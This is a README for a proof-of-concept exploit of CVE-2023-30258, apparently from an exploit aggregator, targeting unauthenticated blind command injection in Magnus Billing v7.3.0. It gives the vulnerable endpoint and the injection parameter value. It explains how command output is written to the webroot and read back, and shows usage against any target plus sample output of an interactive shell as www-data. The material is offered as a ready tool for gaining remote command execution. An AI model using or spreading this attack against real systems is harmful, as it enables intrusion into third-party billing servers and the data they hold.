## https://sploitus.com/exploit?id=3E76D0CB-4945-5258-BD7E-BD012EB17942
# CVE-2023-30258 — Magnus Billing v7 Command Injection (PoC)
> Unauthenticated command injection vulnerability in Magnus Billing v7.3.0. The `democ` GET parameter in `icepay.php` is passed directly to a shell function without sanitization, allowing arbitrary command execution as the web server user. The injection is blind — output is not reflected in the HTTP response — so this exploit redirects each command's output to a file in the webroot and fetches it back over HTTP.
---
## How it works
1. Sends a GET request to `/mbilling/lib/icepay/icepay.php?democ=;;`.
2. Redirects the command output to a file inside the webroot (`out.txt`).
3. Fetches the output file over HTTP and prints the result.
4. Cleans up the output file on exit.
> If the target uses a different webroot path, adjust `OUTPUT_FILE` at the top of the script.
## Requirements
- Python 3
- Install dependencies:
```bash
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
```
## Usage
```bash
python3 exploit.py -t http://TARGET
```
**Example:**
```
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
```
## References
- [CVE-2023-30258](https://nvd.nist.gov/vuln/detail/CVE-2023-30258)
- [EDB-52170](https://www.exploit-db.com/exploits/52170)
- [Original PoC by Tinashe Matanda](https://github.com/tinashelorenzi/CVE-2023-30258-magnus-billing-v7-exploit)
## Credits
- **Discovery & original exploit:** Tinashe Matanda (SadNinja) / CodeSecLab
- **Cleanup & interactive shell:** [Esteban Zárate](https://github.com/estebanzarate)